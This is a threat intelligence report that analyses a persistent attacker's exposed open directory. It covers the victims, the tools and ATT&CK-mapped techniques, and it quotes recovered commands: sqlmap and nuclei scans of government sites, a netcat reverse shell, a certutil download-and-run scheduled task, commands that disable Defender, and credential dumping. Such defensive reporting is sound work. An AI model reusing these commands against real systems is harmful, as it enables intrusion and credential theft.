Lets Open(Dir) Some Presents: An Analysis of a Persistent Actor’s Activity
2023-12-18 09:6:14 Author: thedfirreport.com(查看原文) 阅读量:65 收藏

This report is a little different than our typical content. We were able to analyze data from a perspective we typically don’t get to see… a threat actor’s host! In early November, we came across an open directory that included more than a year of historical threat actor activity. By analyzing tools, logs and artifacts left open to the internet, we were able to profile the threat actor and their victims.

After analyzing the artifacts we can conclude with moderate confidence that the majority of the threat actor activity conducted was not financially motivated. They routinely scanned for services and vulnerabilities on government services and defense contractors. However, they also demonstrated limited financially motivated behavior’s such as deploying crypto-miners and targeting finance sites. 

In this case, we have structured the report around the Diamond Model (Victim, Capability, Adversary, Infrastructure). The threat actor relied solely on open source tools and frameworks. For example, active scanning and reconnaissance was performed using sqlmap and ghauri, and if vulnerable, exploitation was performed. Command and control frameworks such as Metasploit and Sliver were then used for post exploitation activity. Detailed tactics and techniques are discussed in sections below.

Below is a high level timeline of clustered activity based on the observed intentional targeting of various countries, governments, and sectors:


We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, Havoc, etc. More information on this service can be found here.

Our All Intel service includes private reports, exploit events, long term infrastructure tracking, clustering, C2 configs, and other curated intel, including non-public case data.

We’ll be launching a private ruleset soon, if you’d like to get in at a discounted rate for the beta, please Contact Us.

If you are interested in hearing more about our services, or would like to talk about a free trial, please reach out using the Contact Us page. We look forward to hearing from you.

Analysis and reporting by @svch0st, @pcsc0ut & UC1.

The threat actor targeted several industry sectors over the period of time we were able to observe, which included:

  • Government
  • Defense Contractors
  • Finance (Banking, Investing and Crypto)
  • Critical Infrastructure
  • Telecommunications
  • Escort Services
  • VPS Providers
  • Security Companies
  • Education
  • Media and Political Groups

We noted that the threat actor was persistently targeting the Indian Government and Indian defense contractors for over 10 months between January 2023 to October 2023.

Based on the naming conventions of the target files when conducting nuclei scans, the threat actor grouped their scans into clear targeting. Sometimes these were single domains, others were high level domain names, or full sectors.

Government and Defense

The threat actor took an interest in India and Israel’s Government and Defense Contractors. For example, the below is a sample of initial target domains for the Israeli Government:

They also targeted organizations that contributed to the defense sector for these governments, which included manufacturers of:

  • Weapons, ammunition, and missiles
  • Military aircraft and vehicles
  • Military communication and electronics
  • Drones
  • ID cards
  • Aerospace and satellites

Finance and Cryptocurrency

The threat actor also scanned across Banks and Financial institutions saving the results in target files under “crime” and “cryptz” folders on their host:

Escort Services

The threat actor targeted escort service websites in the same countries they were targeting government infrastructure (i.e. Bangladesh, India and Israel).

A folder “hacking_bad_guys” was left in the nuclei scan outputs. The only targets within this folder were some of the Escort Services domains we observed above:

The threat actor may have targeted these services to collect data on users of these services to leverage it in further campaigns, but no direct data was present to prove this.

Media and Political Groups

Below are some of the political groups and media organizations that were targeted by the threat actor:

  • Hizb utTahrir – Islamic fundamentalist organization
  • Baloch Republican Party – Banned organisation in Pakistan
  • Sindhudesh movement –  Sindhudesh Revolutionary Army (SRA)
  • Tehreek-e-Jafaria – Shia political party
  • Umar Media –Media wing of the Tehrik-i-Taliban
  • ФедералПресс (FederalPress) – Pro-Russian media outlet
  • Новые Известия (Novye Izvestia) – Russian Tabloid
  • Новая газета (Novaya Gazeta) – Russian Independent and government-critical media outlet
  • Freedom House – Non-profit think tank

Security Companies

Various cyber security company websites were scanned by the threat actor including Group-IB, Mandiant, Horizon3, Kaspersky, Qualys, and CrowdStrike:


The threat actor also targeted US based schools such as Michigan State University, Massachusetts Institute of Technology, and Harvard. Two Russian schools Lomonosov Moscow State University and HSE University were also among educational institutions targeted.


We also observed the threat actor scanning telco companies. Targets included companies like Grameenphone and Teletalk (Bangladesh), Jazz (Pakistan), Bezeq and Cellcom (Israel). Vulnerabilities found via nuclei scans include the following list of CVEs:

The following section has been broken into the relevant MITRE ATT&CK tactics and techniques.


T1595.001 Active Scanning – Scanning IP Blocks

Using httpx the threat actor conducted large scale scanning across ASNs. The tool httpx aims to identify web services exposed to the internet and fingerprint what is running behind it. 

echo "AS4758" |httpx --status-code --tech-detect 
echo "AS4758" |httpx --status-code --tech-detect
echo "AS142501" |httpx --status-code --tech-detect -o 142501
echo "AS17813" |httpx --status-code --tech-detect -o 17813
echo "AS55566" |httpx --status-code --tech-detect -o 55566
echo "AS55566" |httpx --status-code --tech-detect -o 55566.txt
echo "AS17813" |httpx --status-code --tech-detect -o 17813.TXT
echo "AS4758" |httpx --status-code --tech-detect -proxy socks5://localhost:1080 -o AS4748

The arguments -status-code and -tech-detect display the HTTP status code and technology in use (based on the wappalyzer dataset). One of the saved httpx outputs can be seen below:

T1595.002 Active Scanning – Vulnerability Scanning

The threat actor used nuclei to conduct scanning and software identification. We were able to see this activity from the bash history file:

nuclei -l sept24.txt -o sept24_op.txt -s critical,high
nuclei -l sept24.txt -o sept24_op.txt -s medium
nuclei -l telco_again_subfinder -o telco_again_subfinder_nuclei_scan -as
nuclei -l rac_drdo_il_govnet -o rac_drdo_il_govnet_18-sept-23_op -s critical,high
nuclei -l co_nic_gov -o co_nic_gov_proxy_output -s critical -proxy socks5://localhost:1080
torify nuclei -u mossad.gov.il -o mossad.gov.il_new
torify nuclei -u shabak.gov.il -o shabak.gov.il_new
torify nuclei -l large_scope -o large_scope -s critical,high
torify nuclei -l large_scope -o large_scope -as

Below was a sample of the captured outputs of the nuclei scans identifying critical vulnerabilities:

T1595.003 Active Scanning – Wordlist Scanning

Using subfinder, the threat actor identified the subdomains of their targets before scanning further:

subfinder -dL drones -o drone_op -silent

The outputs were saved on the host:

T1596 Search Open Technical Databases

The threat actor used the OWASP tool amass to conduct reconnaissance on their targets using open-source databases and APIs:

We discovered a shodan API key used by the threat actor under configuration files in the open directory:

From the bash history, we can see the threat actor using shodan to search for CVE-2022-42475:

shodan search 'vuln="CVE-2022-42475"' --fields ip_str,port --separator " " | awk '{print $1":"$2}'|tee -a temp123.txt

It is noted that this Shodan key was leaked on Telegram at least as far back as early December of 2022, as well as several other places including Linkedin and Cracked[.]io since then.

Initial Access

T1190 Exploit Public-Facing Application

SQL Injection – The threat actor used sqlmap (S0225) and ghauri to conduct SQL injections attacks on target hosts.

The bash history file recorded the execution of these tools and the commands used:

torify sqlmap -u https://<domain>.gov.bd/admin/manage_user.php?id=1  -v 2 --delay 1.7 --time-sec 13 --tamper space2comment --risk 3 --level 5 --random-agent  --no-cast --parse-errors --dbs
torify ghauri -u "https://<domain>.<domain>.in/products/all-products?category=CATMAPF0CE" --dbs

Sqlmap output files

Here we can see the admin user, password, email, login date and login time from the admin_login table:

Here the threat actor exfiltrated a list of 179 email addresses from a power company:

Metasploit Exploits

In the Metasploit and Meterpreter history files we observed the following exploit modules used by the threat actor:

exchange_proxylogon_rce – CVE-2021-26855 CVE-2021-27065

php_fpm_rce – CVE-2019-11043

vmware_vcenter_uploadova_rce – CVE-2021-21972

Python Exploits

In the bash history we observed the threat actor leveraging several python CVE exploit scripts:

CVE-2020-14882.py – CVE-2020-14882

CVE-2020-14882 is a pre-authentication remote code execution exploit that targets Oracle WebLogic Servers running on Windows or Linux.

When successful – this exploit creates a shell on the victim system. Logs from the output of the session were found in the root directory. In this session, the threat actor gained nt authority\system access and was observed performing some initial system discovery, as well as using the type command to write out a certificate file matching the name of one of the targets.

CVE-2023-25157.py – CVE-2023-25157

CVE-2023-25157 is a SQL Injection exploit that targets GeoServer OGC Filter servers. 

CVE-2023-2982.py – CVE-2023-2982

CVE-2023-2982 is an authentication bypass vulnerability in a WordPress plugin named Miniorange Social Login and Register. We observed the threat actor make a directory named exploits. Then clone this exploit into it, cd into the directory, and attempt to exploit a target.


CVE-2019-9978 is a stored XSS vulnerability found in the Social Warfare plugin for WordPress. We observed the threat actor clone and then execute the exploit against a target.

struts-pwn CVE-2017-5638

CVE-2017-5638 is parameter parsing error in the Content-Type HTTP header in Apache Struts that results in a remote command injection vulnerability.

Ghostcat – CVE-2020-1938

CVE-2020-1938 is a file read inclusion vulnerability in Apache Tomcat. You can see below the threat actor again cloned the exploit from GitHub then attempted to exploit the target.

While eight systems were observed vulnerable in the nuclei scan output for this vulnerability – only one was observed being targeted in the bash history:

phpunit.py – CVE-2017-9841

CVE-2017-9841 is an unauthenticated remote command execution vulnerability in PHP Unit.

jexboss – CVE-2015-5317, CVE-2016-3427, CVE-2016-8735, CVE-2017-5638

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Servers. It covers several vulnerabilities and provides the ability to check target lists or networks, as well as exploit vulnerable hosts.

While the bash history only shows indications of the tools being run in file-scan mode (meaning the tools checks for vulnerabilities from a target list provided), additional output spanning an eleven day span was observed.

Further review of the files in the directory indicate the threat actor created a run.py python script to automate the exploitation attempts of of individual targets identified as potentially vulnerability in first file mode scan.

Pulse Secure Exploits

Also found in the exploits folder were two bash scripts that appeared to be exploits for Pulse Secure VPN’s, which have had multiple high risk exploits documented in recent years.

The pulse_secure_file_read.sh is a directory traversal vulnerability that can result in session information being stolen from the firewalls, and possibly reused.

The pulse_secure_2021.sh file, on the other hand, was not a exploit at all. Rather this file was a ‘honeypoc’ as explained in blog by TJ Null and Andy Gill included as a link contained in the file itself. A ‘honeypoc’ is a file released, which purports to be a proof-of-concept exploit for a highly sough after CVE when in reality it is a ruse that includes a canary token, which allows the authors to publish research on the use of publicly available exploits and persons who execute downloaded exploits without reading the source code. Part of the ruse is making the threat actor believe the script has deleted files from the local hard drive:


Discussed further in the Command and Control section, the threat actor used multiple frameworks including Metasploit and Sliver. From the bash and Metasploit history we were able to identify the commands for various Metasploit payloads:


set payload linux/x64/meterpreter/reverse_tcp
set lhost
set lport 4451

T1059.003 Windows Command Shell

From the Meterpreter history we observed the shell command used which will give the actor a standard shell on the target system.

T1059.001 PowerShell

Sometimes they would then change to using PowerShell to execute certain commands.

T1204.002 Malicious File


The threat actor generated a number of various Sliver beacons over the time they used the server.

generate --mtls --save /root --os linux
generate --mtls --save /root --os windows

 We recovered the following beacons for both Windows and Linux:


T1505.003 Server Software Component: Web Shell

The threat actor uploaded a weevely webshell to:


Using the session log left behind, we were able to identify the threat actor used the web shell to identify sensitive information on the host:

T1569.002 System Services: Service Execution

The threat actor used Sliver’s execute-assembly to load SharPersist.

The Sliver audit log recorded the arguments provided to SharPersist which were used to create a Windows service called HealthCheck to run encoded PowerShell.

When decoded, we can see this creates a reverse shell:

They also used sc to create a service for a Sliver implant to gain persistence:

sc create winmo displayname=discord binpath=C:\programdata\mdsn\svchost.exe start=auto

T1053.005 Scheduled Task/Job: Scheduled Task

Loaded in the same way as above, SharPersist was used to create a scheduled task also called HealthCheck to run C:\ProgramData\Software\svchost.exe :

T1546.004 Event Triggered Execution: Unix Shell Configuration Modification

The threat actor used Sliver to upload modified versions of .bashrc to compromised hosts and set up a coin miner. We were able to recover the uploaded files and can see the appended lines below:

The referenced autominionlx.sh is downloaded from the Sliver server:

Shortly afterwards, the Sliver implant is used to add a cronjob to execute the script:

Error messages indicate the bash script is related to the execution of xmrig.

These error messages are resolved by the installation of xmrig, and copying the file to the tmp directory under the .atmon name:

Now the victim system is added to the mining pool for the threat actor:

A review of the XMR Monero Mining Payment History shows activity for the XMR address executed by the script:

Privilege Escalation

T1548 Abuse Elevation Control Mechanism

The threat actor used the built-in Meterpreter getsystem module which uses various techniques to create a payload as SYSTEM.

T1053.005 Scheduled Task/Job: Scheduled Task

During a meterpreter session, the threat actor created a scheduled task to launch a payload as NT AUTHORITY\SYSTEM : 

schtasks /create /RL HIGHEST /RU "NT AUTHORITY\SYSTEM" /sc minute /mo 30 /tn "schdsWin" /tr "cmd.exe /C certutil.exe -urlcache -f %systemdrive%\\Windows\\Temp\\svchost.exe & %systemdrive%\\Windows\\Temp\\svchost.exe"
schtasks /run /TN "schdsWin"

T1068 Exploitation for Privilege Escalation


For several of the targets, after gaining shell access, we found the threat actor executing LinPEAS to try to discover privilege escalation paths on the exploited host.


From the Metasploit history, we observed the threat actor using various Linux privilege escalation modules:

network_manager_vpnc_username_priv_esc – CVE-2018-10900

ptrace_traceme_pkexec_helper – CVE-2019-13272

cve_2021_4034_pwnkit_lpe_pkexec – CVE-2021-4034

Defense Evasion

T1562.001 Impair Defenses: Disable or Modify Tools

Various commands were captured in the Meterpreter history disabling Microsoft Defender:

Set-MpPreference -DisableScriptScanning $True
Add-MpPreference -ExclusionPath "C:\Windows\Temp"
powershell -c iex(Set-MpPreference -DisableRealtimeMonitoring $true)
Set-MpPreference -ExclusionProcess "explorer.exe", "cmd.exe", "powershell.exe"
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v EnableLUA
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force

T1036 Masquerading

T1036.004 Masquerade Task or Service

The threat actor used various masquerading naming conventions to try and blend-in on systems to which they gained access. These techniques were applied to Silver beacons, naming of tasks, and service names.

Masquerading beacon examples:

Masquerading service example:

sc create winmo displayname=discord binpath=C:\programdata\mdsn\svchost.exe start=auto

Credential Access

The threat actor used various techniques to access hashes and credentials of the target hosts.

T1003.002 OS Credential Dumping: Security Account Manager

Meterpreter History:

load kiwi

T1003.003 OS Credential Dumping: NTDS

During a compromise of a host with Sliver, they used the download command to pull back the ntds.dit from the target:


T1003.006 OS Credential Dumping: DCSync

Meterpreter History:

dcsync_ntlm <domain>\<user>

T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket

Meterpreter History:


T1552.001 Unsecured Credentials: Credentials In Files

The threat actor used the PowerView module Find-InterestingDomainShareFile to search for password files:

Find-InterestingDomainShareFile -Include *passwords*

T1552.004 – Unsecured Credentials: Private Keys

In one instance the threat actor obtained access with Sliver, they then worked to execute a remote script on the affected host:

A recovered version of this script shows that it uses a clever technique for self propagation on Linux. In addition to disabling UFW and killing several running services, the script then turns to enumerating all the private keys stored on the hosts, parsing all the hosts in the known_hosts files, as well as username associated with any keys found.

This information is then used to iterate through each possible combination of enumerated users, hosts, and keys to attempt to move laterally by using SSH to remotely execute the same script on any connections that might be successful.

The script and IP serving infrastructure used here have been linked to a botnet referred to as the Sysrv-Hello botnet. This has been noted in various campaigns since at least 2021:


T1087.001 Account Discovery: Local Account

T1087.002 Account Discovery: Domain Account

T1615 Group Policy Discovery

T1083 File and Directory Discovery

T1069.001 Permission Groups Discovery: Local Groups

T1069.002 Permission Groups Discovery: Domain Groups

In one instance, the threat actor used certutil to download PowerView to run various discovery commands. Below are some of the commands captured in Meterpreter history. The threat actor needed to output the commands to a public location served on an Exchange server to retrieve the results.

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 powershellintelmodule.ps1
Import-Module C:\windows\system32\powershellintelmodule.psm1
Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
Get-DomainController -Domain <domain>
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
Copy-Item -Path "C:\Windows\System32\DomainUsers.txt" -Destination "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\syslog.txt
Get-DomainUser -Identity Administrator -Properties DisplayName, MemberOf | Format-List
Find-DomainUserLocation -Domain Exchange | Select-Object UserName, SessionFromName
Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
Get-DomainGroup | Out-File -FilePath .\intelwind.txt
Copy-Item -Path "C:\windows\system32\intelwind.txt" -Destination "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\systlog.txt"
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
Get-DomainOU -Properties Name | Sort-Object -Property Name
Get-DomaiObjectAcl -Identity ExchangeAD -ResolveGUIDs
Find-InterestingDomainAcl -ResolveGUIDs

T1016 System Network Configuration Discovery

T1082 System Information Discovery

T1033 System Owner/User Discovery

In another compromised host, we saw other common commands we observe to gain situational awareness in the environment.

echo %logonserver%
net user /domain

Other discovery commands used through Meterpreter include the following:

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
netstat -ano


While using Sliver, the threat actor executed invoke-adPEAS at least twice:

powershell -c Invoke-adPEAS

While using Sliver, the most used command was “net user /domain” followed by “net user”:

"net user /domain"
"net user"

Other discovery commands that were used by the threat actor while using Sliver include the following:

powershell -c Get-Service
arp -a
powershell -c (Get-WMIObject -class Win32_ComputerSystem)
powershell -c Get-Domain
powershell -c echo %UERNAME%
sc query
run wmic service get name , pathname
powershell.exe -c (Get-Domain)
powershell -c (Invoke-adPEAS -Domain REDACTED.local)
powershell -c (Get-WMIObject)
net group Domain Admins /domain
echo %user%
arp -aon

Command and Control


Meterpreter history included the following PowerShell reverse shell:

This shell is the same that was documented in:

From the Meterpreter history, we can see the following commands were used:

set payload payload/cmd/windows/powershell_reverse_tcp

S0633 – Sliver

Analyzing the local Sliver DB (.sliver/sliver.db), we can extract the C2 endpoint and active implants.

Last Implant Create Time Implant C2 Endpoint
2023-10-19 17:58:54 mtls://
2022-12-22 12:00:39 hxxp://apicalls[.]net
2022-08-12 06:21:02 mtls://

We can query the beacons table to get a list of the compromised hosts and the associated command and control server endpoint:

In the database we observed 66 beacons connecting to the server. From these connected beacons, we derived the following dwell time statistics.

Average Dwell Time Minimum Dwell Time Maximum Dwell Time Median Dwell Time
12.83 Hours 0 (failed beacons) 13 Days 1.41 minutes

Beacons with a minimum time of zero seconds indicate the the beacon failed, perhaps because the attack was unsuccessful. For other beacons we observed indications that the threat actor was testing the beacon. When reviewing the 66 beacons only 16 of them had an active time of more than five minutes.

The Sliver multiplayer port 31337 is exposed on as seen by Shodan:

In our Threat Intel services tracking the following data was observed. We first picked up the server as hosting a Sliver team server on 2022-11-16.  We continued to observe it until 2023-02-13. After that we picked it up again for Sliver activity on 2023-10-09. The server remains active in our dataset through the date of publication.

S0154 – Cobalt Strike

While we didn’t observe the threat actor actively use Cobalt Strike, a copy of v4.7 was found in the opendir. The server logs recorded one login on 10 Apr 2023 from :

04/10 19:46:17 UTC *** neo ( joined
04/10 19:48:39 UTC *** neo quit

The md5 of the license file cobaltstrike.auth was 0c5ede28df39341763d16961a118625d.

When using the authkey.pub to decrypt the .auth file, the following results were returned:

Key:		1be5be52c6255c33558e8a1cb667cb06
End date:	Aug 31 2022
Watermark:	175065ea
Version:	47

The watermark associated with the kit is 0x175065ea (391144938) which is associated with cracked versions.

T1572 Protocol Tunneling

The threat actor used the Meterpreter module portfwd to establish a reverse port forward with the C2 IP:

portfwd add -R -p 89474 -l 4453 -L

We also observed in the sliver-client.log where they used netcat:

nc -e /bin/bash 1608 2> /dev/null

The tool gost was found in the root of the open directory. While we didn’t observe the use of this tool, it can be used to create a proxy between victim and threat actor.

T1090.003 Multi-hop Proxy

The threat actor regularly made use of torify to proxy activity via the TOR network.

Sliver Operator names

The Sliver database ./.sliver/sliver.db included the names and tokens of the operators on the Sliver server.

T1583.001 Acquire Infrastructure – Domains


The domain smilevolume[.]com was registered in December 2021 via NameCheap. The domain apicalls[.]net was registered in September 2022 and is masked.

There were 6 IPs recorded in ./ssh/known_hosts :

Pivoting on the SSH Fingerprint, there are 12 additional IPs matching the search on Shodan:

"d2:da:76:47:70:80:c2:ba:9d:7a:62:36:60:d6:a1:58" port:22

The threat actor established dynamic port forwarding with proxy hosts for multiple tooling.

ssh -N -D 1080 [email protected]
ssh -N -D 1080 [email protected]
ssh -N -D 1080 [email protected] -p 1080
ssh -N -D 1080 [email protected]

The IP used to proxy traffic is a Mikrotik router in India:

The last entry (as well as another IP observed in the known hosts file) indicate the threat actor was using a SSH VPN service – vpnjantit[.]com to hide some of the traffic. The default SSH username for vpnjantit[.]com is the service login with the “-vpnjantit[.]com” added to the end according to the site’s documentation. This indicates the username used for the vpnjantit[.]com service was ‘pareshraval’.

Diamond Model







Xmrig setup


Sliver Beacons Windows:

















Silver Beacons Linux:










Other Files:


Scanning IP Blocks - T1595.001
Vulnerability Scanning - T1595.002
Wordlist Scanning - T1595.003
Search Open Technical Databases - T1596
Exploit Public-Facing Application - T1190
Web Shell - T1505.003
Service Execution - T1569.002
Scheduled Task - T1053.005
Unix Shell Configuration Modification - T1546.004
Abuse Elevation Control Mechanism - T1548
Disable or Modify Tools - T1562.001
Security Account Manager - T1003.002
NTDS - T1003.003
DCSync - T1003.006
Golden Ticket - T1558.001
Credentials in Files - T1081
Private Keys - T1552.004
Domain Account - T1087.002
Local Account - T1087.001
Group Policy Discovery - T1615
File and Directory Discovery - T1083
Local Groups - T1069.001
Domain Groups - T1069.002
System Network Configuration Discovery - T1016
System Information Discovery - T1082
System Owner/User Discovery - T1033
PowerShell - T1059.001
Protocol Tunneling - T1572
Web Protocols - T1071.001
Exfiltration Over C2 Channel - T1041
Resource Hijacking - T1496
Exploitation for Privilege Escalation - T1068
Multi-hop Proxy - T1090.003
Masquerading - T1036
Masquerade Task or Service - T1036.004
Windows Command Shell - T1059.003
Malicious File - T1204.002

Internal case #25559

文章来源: https://thedfirreport.com/2023/12/18/lets-opendir-some-presents-an-analysis-of-a-persistent-actors-activity/